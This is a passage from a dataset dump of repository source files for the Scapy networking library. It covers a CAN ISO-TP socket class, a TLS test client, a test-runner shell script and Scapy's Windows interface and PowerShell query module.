CANFD_BRS */\n # /* Obsolete when the BRS flag is fixed */\n # /* by the CAN netdriver configuration */\n # };\n\n def __get_sock_ifreq(self, sock, iface):\n socketID = ctypes.c_int(sock.fileno())\n ifr = IFREQ()\n ifr.ifr_name = iface.encode('ascii')\n ret = LIBC.ioctl(socketID, SIOCGIFINDEX, ctypes.byref(ifr))\n\n if ret < 0:\n m = u'Failure while getting \"{}\" interface index.'.format(iface)\n raise Scapy_Exception(m)\n return ifr\n\n def __bind_socket(self, sock, iface, sid, did):\n socketID = ctypes.c_int(sock.fileno())\n ifr = self.__get_sock_ifreq(sock, iface)\n\n if sid > 0x7ff:\n sid = sid | socket.CAN_EFF_FLAG\n if did > 0x7ff:\n did = did | socket.CAN_EFF_FLAG\n\n # select the CAN interface and bind the socket to it\n addr = SOCKADDR_CAN(ctypes.c_uint16(socket.PF_CAN),\n ifr.ifr_ifindex,\n ADDR_INFO(TP(ctypes.c_uint32(sid),\n ctypes.c_uint32(did))))\n\n error = LIBC.bind(socketID, ctypes.byref(addr), ctypes.sizeof(addr))\n\n if error < 0:\n warning(\"Couldn't bind socket\")\n\n def __set_option_flags(self, sock, extended_addr=None,\n extended_rx_addr=None,\n listen_only=False):\n option_flags = CAN_ISOTP_DEFAULT_FLAGS\n if extended_addr is not None:\n option_flags = option_flags | CAN_ISOTP_EXTEND_ADDR\n else:\n extended_addr = CAN_ISOTP_DEFAULT_EXT_ADDRESS\n\n if extended_rx_addr is not None:\n option_flags = option_flags | CAN_ISOTP_RX_EXT_ADDR\n else:\n extended_rx_addr = CAN_ISOTP_DEFAULT_EXT_ADDRESS\n\n if listen_only:\n option_flags = option_flags | CAN_ISOTP_LISTEN_MODE\n\n sock.setsockopt(SOL_CAN_ISOTP,\n CAN_ISOTP_OPTS,\n self.__build_can_isotp_options(\n flags=option_flags,\n ext_address=extended_addr,\n rx_ext_address=extended_rx_addr))\n\n def __init__(self,\n iface=None,\n sid=0,\n did=0,\n extended_addr=None,\n extended_rx_addr=None,\n listen_only=False,\n basecls=ISOTP):\n self.iface = conf.contribs['NativeCANSocket']['iface'] \\\n if iface is None else iface\n self.ins = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, CAN_ISOTP)\n self.__set_option_flags(self.ins,\n extended_addr,\n extended_rx_addr,\n listen_only)\n\n self.ins.setsockopt(SOL_CAN_ISOTP,\n CAN_ISOTP_RECV_FC,\n self.__build_can_isotp_fc_options())\n self.ins.setsockopt(SOL_CAN_ISOTP,\n CAN_ISOTP_LL_OPTS,\n self.__build_can_isotp_ll_options())\n\n self.__bind_socket(self.ins, iface, sid, did)\n self.outs = self.ins\n if basecls is None:\n warning('Provide a basecls ')\n self.basecls = basecls\n\n def recv_raw(self, x=0xffff):\n \"\"\"Receives a packet, then returns a tuple containing (cls, pkt_data, time)\"\"\"\n try:\n pkt = self.ins.recvfrom(x)[0]\n except BlockingIOError: # noqa: F821\n warning('Captured no data, socket in non-blocking mode.')\n return None\n except socket.timeout:\n warning('Captured no data, socket read timed out.')\n return None\n except OSError:\n # something bad happened (e.g. 
the interface went down)\n warning(\"Captured no data.\")\n return None\n\n ts = get_last_packet_timestamp(self.ins)\n return self.basecls, pkt, ts\n\n def send(self, x):\n if hasattr(x, \"sent_time\"):\n x.sent_time = time.time()\n return self.outs.send(bytes(x))\n\n def sr(self, *args, **kargs):\n return sndrcv(self, *args, **kargs)\n\n def sr1(self, *args, **kargs):\n data = sndrcv(self, *args, **kargs)\n if data:\n return data[0][0][1]\n\n def sniff(self, *args, **kargs):\n return sniff(opened_socket=self, *args, **kargs)\n" }, { "alpha_fraction": 0.6705750823020935, "alphanum_fraction": 0.6845337748527527, "avg_line_length": 31.563636779785156, "blob_id": "648a1bb966db74db0625e4aa5ada5f4ae29c400f", "content_id": "b29e81b025292203967abccece25405f3f373f0b", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1791, "license_type": "permissive", "max_line_length": 99, "num_lines": 55, "path": "/scapy/test/tls/travis_test_client.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n## This file is part of Scapy\n## This program is published under a GPLv2 license\n\n\"\"\"\nTLS client used in unit tests.\n\nStart our TLS client, send our send_data, and terminate session with an Alert.\nOptional cipher_cuite_code and version may be provided as hexadecimal strings\n(e.g. c09e for TLS_DHE_RSA_WITH_AES_128_CCM and 0303 for TLS 1.2).\nReception of the exact send_data on the server is to be checked externally.\n\"\"\"\n\nimport sys, os, time\nimport multiprocessing\n\nbasedir = os.path.abspath(os.path.join(os.path.dirname(__file__),\"../../\"))\nsys.path=[basedir]+sys.path\n\nfrom scapy.layers.tls.automaton_cli import TLSClientAutomaton\nfrom scapy.layers.tls.handshake import TLSClientHello\n\n\nsend_data = cipher_suite_code = version = None\n\ndef run_tls_test_client(send_data=None, cipher_suite_code=None, version=None):\n if version == \"0002\":\n t = TLSClientAutomaton(data=[send_data, b\"stop_server\", b\"quit\"], version=\"sslv2\")\n else:\n ch = TLSClientHello(version=int(version, 16), ciphers=int(cipher_suite_code, 16))\n t = TLSClientAutomaton(client_hello=ch, data=[send_data, b\"stop_server\", b\"quit\"], debug=1)\n t.run()\n\nfrom travis_test_server import run_tls_test_server\n\ndef test_tls_client(suite, version, q):\n msg = (\"TestC_%s_data\" % suite).encode()\n # Run server\n q_ = multiprocessing.Manager().Queue()\n th_ = multiprocessing.Process(target=run_tls_test_server, args=(msg, q_))\n th_.start()\n # Synchronise threads\n assert q_.get() is True\n time.sleep(1)\n # Run client\n run_tls_test_client(msg, suite, version)\n # Wait for server\n th_.join(60)\n if th_.is_alive():\n th_.terminate()\n raise RuntimeError(\"Test timed out\")\n # Return values\n q.put(q_.get())\n q.put(th_.exitcode)\n" }, { "alpha_fraction": 0.5614035129547119, "alphanum_fraction": 0.5964912176132202, "avg_line_length": 18, "blob_id": "a184bbf2e15d1bd40a2d4979a04974ee0bbc6300", "content_id": "0ad4b40a0e4252813c6e501956b41b3a955fd44e", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 57, "license_type": "permissive", "max_line_length": 30, "num_lines": 3, "path": "/scapy/test/run_tests_py2", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#! /bin/sh\nPYTHON=python2\n. 
$(dirname $0)/run_tests \"$@\"\n" }, { "alpha_fraction": 0.5769277811050415, "alphanum_fraction": 0.5897932648658752, "avg_line_length": 35.90443801879883, "blob_id": "d8247118e1497664a1702599d55d6c8f5d1a5f3e", "content_id": "9a5e1c4765a4edf4ecebb894a5ca3d021c81c9f8", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49046, "license_type": "permissive", "max_line_length": 147, "num_lines": 1329, "path": "/scapy/scapy/arch/windows/__init__.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "# This file is part of Scapy\n# See http://www.secdev.org/projects/scapy for more informations\n# Copyright (C) Philippe Biondi <phil@secdev.org>\n# Copyright (C) Gabriel Potter <gabriel@potter.fr>\n# This program is published under a GPLv2 license\n\n\"\"\"\nCustomizations needed to support Microsoft Windows.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport os\nimport re\nimport sys\nimport socket\nimport time\nimport itertools\nimport platform\nimport subprocess as sp\nfrom glob import glob\nimport ctypes\nfrom ctypes import wintypes\nimport tempfile\nfrom threading import Thread, Event\n\nimport scapy\nfrom scapy.config import conf, ConfClass\nfrom scapy.error import Scapy_Exception, log_loading, log_runtime, warning\nfrom scapy.utils import atol, itom, inet_aton, inet_ntoa, PcapReader, pretty_list\nfrom scapy.utils6 import construct_source_candidate_set\nfrom scapy.base_classes import Gen, Net, SetGen\nfrom scapy.data import MTU, ETHER_BROADCAST, ETH_P_ARP\n\nimport scapy.modules.six as six\nfrom scapy.modules.six.moves import range, zip, input, winreg\nfrom scapy.compat import plain_str\n\n_winapi_SetConsoleTitle = ctypes.windll.kernel32.SetConsoleTitleW\n_winapi_SetConsoleTitle.restype = wintypes.BOOL\n_winapi_SetConsoleTitle.argtypes = [wintypes.LPWSTR]\n\n_winapi_GetHandleInformation = ctypes.windll.kernel32.GetHandleInformation\n_winapi_GetHandleInformation.restype = wintypes.BOOL\n_winapi_GetHandleInformation.argtypes = [wintypes.HANDLE, ctypes.POINTER(wintypes.DWORD)]\n\n_winapi_SetHandleInformation = ctypes.windll.kernel32.SetHandleInformation\n_winapi_SetHandleInformation.restype = wintypes.BOOL\n_winapi_SetHandleInformation.argtypes = [wintypes.HANDLE, wintypes.DWORD, wintypes.DWORD]\n\nconf.use_pcap = False\nconf.use_dnet = False\nconf.use_winpcapy = True\n\nWINDOWS = (os.name == 'nt')\n\n# hot-patching socket for missing variables on Windows\nimport socket\nif not hasattr(socket, 'IPPROTO_IPIP'):\n socket.IPPROTO_IPIP = 4\nif not hasattr(socket, 'IPPROTO_AH'):\n socket.IPPROTO_AH = 51\nif not hasattr(socket, 'IPPROTO_ESP'):\n socket.IPPROTO_ESP = 50\nif not hasattr(socket, 'IPPROTO_GRE'):\n socket.IPPROTO_GRE = 47\n\nfrom scapy.arch import pcapdnet\nfrom scapy.arch.pcapdnet import *\n\n_WlanHelper = NPCAP_PATH + \"\\\\WlanHelper.exe\"\n\nimport scapy.consts\n\nIS_WINDOWS_XP = platform.release() == \"XP\"\n\n\ndef is_new_release():\n release = platform.release()\n if conf.prog.powershell is None:\n return False\n try:\n if float(release) >= 8:\n return True\n except ValueError:\n if (release == \"post2008Server\"):\n return True\n return False\n\n\ndef _encapsulate_admin(cmd):\n \"\"\"Encapsulate a command with an Administrator flag\"\"\"\n # To get admin access, we start a new powershell instance with admin\n # rights, which will execute the command\n return \"Start-Process 
PowerShell -windowstyle hidden -Wait -Verb RunAs -ArgumentList '-command &{%s}'\" % cmd\n\n\ndef _windows_title(title=None):\n \"\"\"Updates the terminal title with the default one or with `title`\n if provided.\"\"\"\n if conf.interactive:\n _winapi_SetConsoleTitle(title or \"Scapy v{}\".format(conf.version))\n\n\ndef _suppress_file_handles_inheritance(r=1000):\n \"\"\"HACK: python 2.7 file descriptors.\n\n This magic hack fixes https://bugs.python.org/issue19575\n and https://github.com/secdev/scapy/issues/1136\n by suppressing the HANDLE_FLAG_INHERIT flag to a range of\n already opened file descriptors.\n Bug was fixed on python 3.4+\n \"\"\"\n if sys.version_info[0:2] >= (3, 4):\n return []\n\n import stat\n from msvcrt import get_osfhandle\n\n HANDLE_FLAG_INHERIT = 0x00000001\n\n handles = []\n for fd in range(r):\n try:\n s = os.fstat(fd)\n except OSError:\n continue\n if stat.S_ISREG(s.st_mode):\n osf_handle = get_osfhandle(fd)\n flags = wintypes.DWORD()\n _winapi_GetHandleInformation(osf_handle, flags)\n if flags.value & HANDLE_FLAG_INHERIT:\n _winapi_SetHandleInformation(osf_handle, HANDLE_FLAG_INHERIT, 0)\n handles.append(osf_handle)\n\n return handles\n\n\ndef _restore_file_handles_inheritance(handles):\n \"\"\"HACK: python 2.7 file descriptors.\n\n This magic hack fixes https://bugs.python.org/issue19575\n and https://github.com/secdev/scapy/issues/1136\n by suppressing the HANDLE_FLAG_INHERIT flag to a range of\n already opened file descriptors.\n Bug was fixed on python 3.4+\n \"\"\"\n if sys.version_info[0:2] >= (3, 4):\n return\n\n HANDLE_FLAG_INHERIT = 0x00000001\n\n for osf_handle in handles:\n try:\n _winapi_SetHandleInformation(osf_handle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT)\n except (ctypes.WinError, WindowsError, OSError):\n pass\n\n\nclass _PowershellManager(Thread):\n \"\"\"Instance used to send multiple commands on the same Powershell process.\n Will be instantiated on loading and automatically stopped.\n \"\"\"\n\n def __init__(self):\n opened_handles = _suppress_file_handles_inheritance()\n try:\n # Start & redirect input\n if conf.prog.powershell:\n cmd = [conf.prog.powershell,\n \"-NoLogo\", \"-NonInteractive\", # Do not print headers\n \"-Command\", \"-\"] # Listen commands from stdin\n else: # Fallback on CMD (powershell-only commands will fail, but scapy use the VBS fallback)\n cmd = [conf.prog.cmd]\n # Let's hide the window with startup infos\n startupinfo = sp.STARTUPINFO()\n startupinfo.dwFlags |= sp.STARTF_USESHOWWINDOW\n self.process = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE, stderr=sp.STDOUT, startupinfo=startupinfo)\n self.cmd = not conf.prog.powershell\n finally:\n _restore_file_handles_inheritance(opened_handles)\n self.buffer = []\n self.running = True\n self.query_complete = Event()\n Thread.__init__(self)\n self.daemon = True\n self.start()\n if self.cmd:\n self.query([\"echo @off\"]) # Remove header\n else:\n self.query([\"$FormatEnumerationLimit=-1\"]) # Do not crop long IP lists\n _windows_title() # Reset terminal title\n\n def run(self):\n while self.running:\n read_line = self.process.stdout.readline().strip()\n if read_line == b\"scapy_end\":\n self.query_complete.set()\n else:\n self.buffer.append(read_line.decode(\"utf8\", \"ignore\") if six.PY3 else read_line)\n\n def query(self, command, crp=True, rst_t=False):\n self.query_complete.clear()\n if not self.running:\n self.__init__(self)\n # Call powershell query using running process\n self.buffer = []\n # 'scapy_end' is used as a marker of the end of execution\n query = \" 
\".join(command) + (\"&\" if self.cmd else \";\") + \" echo scapy_end\\n\"\n self.process.stdin.write(query.encode())\n self.process.stdin.flush()\n self.query_complete.wait()\n if rst_t:\n _windows_title()\n return self.buffer[crp:] # Crops first line: the command\n\n def close(self):\n self.running = False\n try:\n self.process.stdin.write(\"exit\\n\")\n self.process.terminate()\n except:\n pass\n\n\ndef _exec_query_ps(cmd, fields):\n \"\"\"Execute a PowerShell query, using the cmd command,\n and select and parse the provided fields.\n \"\"\"\n if not conf.prog.powershell:\n raise OSError(\"Scapy could not detect powershell !\")\n # Build query\n query_cmd = cmd + ['|', 'select %s' % ', '.join(fields), # select fields\n '|', 'fl', # print as a list\n '|', 'out-string', '-Width', '4096'] # do not crop\n l = []\n # Ask the powershell manager to process the query\n stdout = POWERSHELL_PROCESS.query(query_cmd)\n # Process stdout\n for line in stdout:\n if not line.strip(): # skip empty lines\n continue\n sl = line.split(':', 1)\n if len(sl) == 1:\n l[-1] += sl[0].strip()\n continue\n else:\n l.append(sl[1].strip())\n if len(l) == len(fields):\n yield l\n l = []\n\n\ndef _vbs_exec_code(code, split_tag=\"@\"):\n if not conf.prog.cscript:\n raise OSError(\"Scapy could not detect cscript !\")\n tmpfile = tempfile.NamedTemporaryFile(mode=\"wb\", suffix=\".vbs\", delete=False)\n tmpfile.write(raw(code))\n tmpfile.close()\n ps = sp.Popen([conf.prog.cscript, tmpfile.name],\n stdout=sp.PIPE, stderr=open(os.devnull),\n universal_newlines=True)\n for _ in range(3):\n # skip 3 first lines\n ps.stdout.readline()\n for line in ps.stdout:\n data = line.replace(\"\\n\", \"\").split(split_tag)\n for l in data:\n yield l\n os.unlink(tmpfile.name)\n _windows_title()\n\n\ndef _get_hardware_iface_guid(devid):\n \"\"\"\n Get the hardware interface guid for device with 'devid' number\n or None if such interface does not exist.\n \"\"\"\n devid = int(devid) + 1\n\n hkey = winreg.HKEY_LOCAL_MACHINE\n node = r\"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards\\{}\".format(devid)\n try:\n key = winreg.OpenKey(hkey, node)\n guid, _ = winreg.QueryValueEx(key, \"ServiceName\")\n winreg.CloseKey(key)\n except WindowsError:\n return None\n guid = guid.strip()\n return guid if guid.startswith(\"{\") and guid.endswith(\"}\") else None\n\n\ndef _get_npcap_dot11_adapters():\n \"\"\"\n Get the npcap 802.11 adapters from the registry or None if npcap\n is not 802.11 enabled.\n \"\"\"\n hkey = winreg.HKEY_LOCAL_MACHINE\n node = r\"SYSTEM\\CurrentControlSet\\Services\\npcap\\Parameters\"\n try:\n key = winreg.OpenKey(hkey, node)\n dot11_adapters, _ = winreg.QueryValueEx(key, \"Dot11Adapters\")\n winreg.CloseKey(key)\n except WindowsError:\n return None\n return dot11_adapters\n\n\n# Some names differ between VBS and PS\n# None: field will not be returned under VBS\n_VBS_WMI_FIELDS = {\n \"Win32_NetworkAdapter\": {\n \"InterfaceDescription\": \"Description\",\n # Note: when using VBS, the GUID is not the same than with Powershell\n # So we use get the device ID instead, then use _get_hardware_iface_guid\n # To get its real GUID\n \"GUID\": \"DeviceID\"\n },\n \"*\": {\n \"Status\": \"State\"\n }\n}\nif IS_WINDOWS_XP:\n # On windows XP, InterfaceIndex does not exist in cscript, and is Index.\n # This is not the case on Windows 7+\n _VBS_WMI_FIELDS[\"Win32_NetworkAdapter\"][\"InterfaceIndex\"] = \"Index\"\n\n_VBS_WMI_REPLACE = {\n \"Win32_NetworkAdapterConfiguration\": {\n \"line.IPAddress\": \"\\\"{\\\" & Join( 
line.IPAddress, \\\", \\\" ) & \\\"}\\\"\",\n }\n}\n\n_VBS_WMI_OUTPUT = {\n \"Win32_NetworkAdapter\": {\n \"DeviceID\": _get_hardware_iface_guid,\n }\n}\n\n\ndef _exec_query_vbs(cmd, fields):\n \"\"\"Execute a query using VBS. Currently Get-WmiObject, Get-Service\n queries are supported.\n\n \"\"\"\n if not(len(cmd) == 2 and cmd[0] in [\"Get-WmiObject\", \"Get-Service\"]):\n return\n action = cmd[0]\n fields = [_VBS_WMI_FIELDS.get(cmd[1], _VBS_WMI_FIELDS.get(\"*\", {})).get(fld, fld) for fld in fields]\n if IS_WINDOWS_XP:\n # On Windows XP, the Ampersand operator does not exist.\n # Using old method (which does not support missing parameters (e.g. WLAN interfaces))\n parsed_command = \"\\n \".join(\"WScript.Echo line.%s\" % fld for fld in fields if fld is not None)\n else:\n parsed_command = \"WScript.Echo \" + \" & \\\" @ \\\" & \".join(\"line.%s\" % fld for fld in fields if fld is not None)\n # The IPAddress is an array: convert it to a string\n for key, val in _VBS_WMI_REPLACE.get(cmd[1], {}).items():\n parsed_command = parsed_command.replace(key, val)\n if action == \"Get-WmiObject\":\n values = _vbs_exec_code(\"\"\"Set wmi = GetObject(\"winmgmts:\")\nSet lines = wmi.InstancesOf(\"%s\")\nOn Error Resume Next\nErr.clear\nFor Each line in lines\n %s\nNext\n\"\"\" % (cmd[1], parsed_command), \"@\")\n elif action == \"Get-Service\":\n values = _vbs_exec_code(\"\"\"serviceName = \"%s\"\nSet wmi = GetObject(\"winmgmts://./root/cimv2\")\nSet line = wmi.Get(\"Win32_Service.Name='\" & serviceName & \"'\")\n%s\n\"\"\" % (cmd[1], parsed_command), \"@\")\n\n while True:\n yield [None if fld is None else\n _VBS_WMI_OUTPUT.get(cmd[1], {}).get(fld, lambda x: x)(\n next(values).strip()\n )\n for fld in fields]\n\n\ndef exec_query(cmd, fields):\n \"\"\"Execute a system query using PowerShell if it is available, and\n using VBS/cscript as a fallback.\n\n \"\"\"\n if conf.prog.powershell is None:\n return _exec_query_vbs(cmd, fields)\n return _exec_query_ps(cmd, fields)\n\n\ndef _where(filename, dirs=None, env=\"PATH\"):\n \"\"\"Find file in current dir, in deep_lookup cache or in system path\"\"\"\n if dirs is None:\n dirs = []\n if not isinstance(dirs, list):\n dirs = [dirs]\n if glob(filename):\n return filename\n paths = [os.curdir] + os.environ[env].split(os.path.pathsep) + dirs\n try:\n return next(os.path.normpath(match)\n for path in paths\n for match in glob(os.path.join(path, filename))\n if match)\n except StopIteration:\n raise IOError(\"File not found: %s\" % filename)\n\n\ndef win_find_exe(filename, installsubdir=None, env=\"ProgramFiles\"):\n \"\"\"Find executable in current dir, system path or given ProgramFiles subdir\"\"\"\n fns = [filename] if filename.endswith(\".exe\") else [filename + \".exe\", filename]\n for fn in fns:\n try:\n if installsubdir is None:\n path = _where(fn)\n else:\n path = _where(fn, dirs=[os.path.join(os.environ[env], installsubdir)])\n except IOError:\n path = None\n else:\n break\n return path\n\n\nclass WinProgPath(ConfClass):\n _default = \"<System default>\"\n\n def __init__(self):\n self._reload()\n\n def _reload(self):\n self.pdfreader = None\n self.psreader = None\n # We try some magic to find the appropriate executables\n self.dot = win_find_exe(\"dot\")\n self.tcpdump = win_find_exe(\"windump\")\n self.tshark = win_find_exe(\"tshark\")\n self.tcpreplay = win_find_exe(\"tcpreplay\")\n self.display = self._default\n self.hexedit = win_find_exe(\"hexer\")\n self.sox = win_find_exe(\"sox\")\n self.wireshark = win_find_exe(\"wireshark\", \"wireshark\")\n 
self.powershell = win_find_exe(\n \"powershell\",\n installsubdir=\"System32\\\\WindowsPowerShell\\\\v1.0\",\n env=\"SystemRoot\"\n )\n self.cscript = win_find_exe(\"cscript\", installsubdir=\"System32\",\n env=\"SystemRoot\")\n self.cmd = win_find_exe(\"cmd\", installsubdir=\"System32\",\n env=\"SystemRoot\")\n if self.wireshark:\n try:\n manu_path = load_manuf(os.path.sep.join(self.wireshark.split(os.path.sep)[:-1]) + os.path.sep + \"manuf\")\n except (IOError, OSError): # FileNotFoundError not available on Py2 - using OSError\n log_loading.warning(\"Wireshark is installed, but cannot read manuf !\")\n manu_path = None\n scapy.data.MANUFDB = conf.manufdb = manu_path\n\n self.os_access = (self.powershell is not None) or (self.cscript is not None)\n\n\nconf.prog = WinProgPath()\nif not conf.prog.os_access:\n warning(\"Scapy did not detect powershell and cscript ! Routes, interfaces and much more won't work !\")\n\nif conf.prog.tcpdump and conf.use_npcap and conf.prog.os_access:\n def test_windump_npcap():\n \"\"\"Return wether windump version is correct or not\"\"\"\n try:\n p_test_windump = sp.Popen([conf.prog.tcpdump, \"-help\"], stdout=sp.PIPE, stderr=sp.STDOUT)\n stdout, err = p_test_windump.communicate()\n _windows_title()\n _output = stdout.lower()\n return b\"npcap\" in _output and b\"winpcap\" not in _output\n except:\n return False\n windump_ok = test_windump_npcap()\n if not windump_ok:\n warning(\"The installed Windump version does not work with Npcap ! Refer to 'Winpcap/Npcap conflicts' in scapy's doc\")\n del windump_ok\n\n\nclass PcapNameNotFoundError(Scapy_Exception):\n pass\n\n\ndef _validate_interface(iface):\n if \"guid\" in iface and iface[\"guid\"]:\n # Fix '-' instead of ':'\n if \"mac\" in iface:\n iface[\"mac\"] = iface[\"mac\"].replace(\"-\", \":\")\n # Potentially, the default Microsoft KM-TEST would have been translated\n if \"name\" in iface:\n if \"KM-TEST\" in iface[\"name\"] and iface[\"name\"] != scapy.consts.LOOPBACK_NAME:\n scapy.consts.LOOPBACK_NAME = iface[\"name\"]\n return True\n return False\n\n\ndef get_windows_if_list():\n \"\"\"Returns windows interfaces.\"\"\"\n if not conf.prog.os_access:\n return []\n if is_new_release():\n # This works only starting from Windows 8/2012 and up. For older Windows another solution is needed\n # Careful: this is weird, but Get-NetAdaptater works like: (Name isn't the interface name)\n # Name InterfaceDescription ifIndex Status MacAddress LinkSpeed\n # ---- -------------------- ------- ------ ---------- ---------\n # Ethernet Killer E2200 Gigabit Ethernet Contro... 
13 Up D0-50-99-56-DD-F9 1 Gbps\n query = exec_query(['Get-NetAdapter'],\n ['InterfaceDescription', 'InterfaceIndex', 'Name',\n 'InterfaceGuid', 'MacAddress', 'InterfaceAlias']) # It is normal that it is in this order\n else:\n query = exec_query(['Get-WmiObject', 'Win32_NetworkAdapter'],\n ['Name', 'InterfaceIndex', 'InterfaceDescription',\n 'GUID', 'MacAddress', 'NetConnectionID'])\n return [\n iface for iface in\n (dict(zip(['name', 'win_index', 'description', 'guid', 'mac', 'netid'], line))\n for line in query)\n if _validate_interface(iface)\n ]\n\n\ndef get_ips(v6=False):\n \"\"\"Returns all available IPs matching to interfaces, using the windows system.\n Should only be used as a WinPcapy fallback.\"\"\"\n res = {}\n for descr, ipaddr in exec_query(['Get-WmiObject',\n 'Win32_NetworkAdapterConfiguration'],\n ['Description', 'IPAddress']):\n if ipaddr.strip():\n res[descr] = ipaddr.split(\",\", 1)[v6].strip('{}').strip()\n return res\n\n\ndef get_ip_from_name(ifname, v6=False):\n \"\"\"Backward compatibility: indirectly calls get_ips\n Deprecated.\"\"\"\n return get_ips(v6=v6).get(ifname, \"\")\n\n\nclass NetworkInterface(object):\n \"\"\"A network interface of your local host\"\"\"\n\n def __init__(self, data=None):\n self.name = None\n self.ip = None\n self.mac = None\n self.pcap_name = None\n self.description = None\n self.data = data\n self.invalid = False\n self.raw80211 = None\n if data is not None:\n self.update(data)\n\n def update(self, data):\n \"\"\"Update info about network interface according to given dnet dictionary\"\"\"\n if 'netid' in data and data['netid'] == scapy.consts.LOOPBACK_NAME:\n # Force LOOPBACK_NAME: Some Windows systems overwrite 'name'\n self.name = scapy.consts.LOOPBACK_NAME\n else:\n self.name = data['name']\n self.description = data['description']\n self.win_index = data['win_index']\n self.guid = data['guid']\n if 'invalid' in data:\n self.invalid = data['invalid']\n # Other attributes are optional\n self._update_pcapdata()\n\n try:\n # Npcap loopback interface\n if self.name == scapy.consts.LOOPBACK_NAME and conf.use_npcap:\n # https://nmap.org/npcap/guide/npcap-devguide.html\n self.mac = \"00:00:00:00:00:00\"\n self.ip = \"127.0.0.1\"\n conf.cache_ipaddrs[self.pcap_name] = socket.inet_aton(self.ip)\n return\n else:\n self.mac = data['mac']\n except KeyError:\n pass\n\n try:\n self.ip = socket.inet_ntoa(get_if_raw_addr(self))\n except (TypeError, NameError):\n pass\n\n try:\n # Windows native loopback interface\n if not self.ip and self.name == scapy.consts.LOOPBACK_NAME:\n self.ip = \"127.0.0.1\"\n conf.cache_ipaddrs[self.pcap_name] = socket.inet_aton(self.ip)\n except (KeyError, AttributeError, NameError) as e:\n print(e)\n\n def _update_pcapdata(self):\n if self.is_invalid():\n return\n for i in get_if_list():\n if i.endswith(self.data['guid']):\n self.pcap_name = i\n return\n\n raise PcapNameNotFoundError\n\n def is_invalid(self):\n return self.invalid\n\n def _check_npcap_requirement(self):\n if not conf.use_npcap:\n raise OSError(\"This operation requires Npcap.\")\n if self.raw80211 is None:\n # This checks if npcap has Dot11 enabled and if the interface is compatible,\n # by looking for the npcap/Parameters/Dot11Adapters key in the registry.\n dot11adapters = _get_npcap_dot11_adapters()\n self.raw80211 = (dot11adapters is not None and\n ((\"\\\\Device\\\\\" + self.guid).lower() in dot11adapters.lower()))\n if not self.raw80211:\n raise Scapy_Exception(\"This interface does not support raw 802.11\")\n\n def mode(self):\n \"\"\"Get the 
interface operation mode.\n Only available with Npcap.\"\"\"\n self._check_npcap_requirement()\n return POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"mode\"], crp=False, rst_t=True)[0].strip()\n\n def ismonitor(self):\n \"\"\"Returns True if the interface is in monitor mode.\n Only available with Npcap.\"\"\"\n try:\n return self.mode() == \"monitor\"\n except Scapy_Exception:\n return False\n\n def setmonitor(self, enable=True):\n \"\"\"Alias for setmode('monitor') or setmode('managed')\n Only availble with Npcap\"\"\"\n if enable:\n return self.setmode('monitor')\n else:\n return self.setmode('managed')\n\n def availablemodes(self):\n \"\"\"Get all available interface modes.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"modes\"], crp=False, rst_t=True)[0].split(\",\")\n\n def setmode(self, mode):\n \"\"\"Set the interface mode. It can be:\n - 0 or managed: Managed Mode (aka \"Extensible Station Mode\")\n - 1 or monitor: Monitor Mode (aka \"Network Monitor Mode\")\n - 2 or master: Master Mode (aka \"Extensible Access Point\") (supported from Windows 7 and later)\n - 3 or wfd_device: The Wi-Fi Direct Device operation mode (supported from Windows 8 and later)\n - 4 or wfd_owner: The Wi-Fi Direct Group Owner operation mode (supported from Windows 8 and later)\n - 5 or wfd_client: The Wi-Fi Direct Client operation mode (supported from Windows 8 and later)\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n _modes = {\n 0: \"managed\",\n 1: \"monitor\",\n 2: \"master\",\n 3: \"wfd_device\",\n 4: \"wfd_owner\",\n 5: \"wfd_client\"\n }\n m = _modes.get(mode, \"unknown\") if isinstance(mode, int) else mode\n return not POWERSHELL_PROCESS.query([_encapsulate_admin(_WlanHelper + \" \" + self.guid[1:-1] + \" mode \" + m)], rst_t=True)\n\n def channel(self):\n \"\"\"Get the channel of the interface.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n x = POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"channel\"],\n crp=False)[0].strip()\n return int(x)\n\n def setchannel(self, channel):\n \"\"\"Set the channel of the interface (1-14):\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return not POWERSHELL_PROCESS.query([_encapsulate_admin(_WlanHelper + \" \" + self.guid[1:-1] + \" channel \" + str(channel))],\n rst_t=True)\n\n def frequence(self):\n \"\"\"Get the frequence of the interface.\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n x = POWERSHELL_PROCESS.query([_WlanHelper, self.guid[1:-1], \"freq\"], crp=False, rst_t=True)[0].strip()\n return int(x)\n\n def setfrequence(self, freq):\n \"\"\"Set the channel of the interface (1-14):\n Only available with Npcap.\"\"\"\n # According to https://nmap.org/npcap/guide/npcap-devguide.html#npcap-feature-dot11\n self._check_npcap_requirement()\n return not 